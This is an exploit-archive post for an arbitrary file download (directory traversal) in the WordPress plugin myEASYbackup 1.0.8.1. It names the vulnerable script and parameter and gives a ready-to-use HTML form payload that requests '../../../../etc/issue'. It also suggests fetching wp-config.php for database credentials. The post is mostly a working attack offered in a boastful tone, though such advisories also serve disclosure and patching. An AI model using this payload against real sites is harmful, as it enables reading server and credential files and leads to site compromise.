Home / exploits

PDF

WordPress myEASYbackup 1.0.8.1 Directory Traversal

Posted on 16 January 2012

wordpress plugin myEASYbackup 1.0.8.1 arbitrary file download
http://wordpress.org/extend/plugins/myeasybackup/

parameter "dwn_file" (post)
script "meb_download.php"
you can get wp-config.php or whatever (using advanced directory traversal
technology)!

<form method="post" action="http://CENSORED/wp-content/plugins/myeasybackup/meb_download.php">
<input type="text" name="dwn_file" value="../../../../../../../../etc/issue">
<input type="submit">
</form>

author: antiphastrophus

 

TOP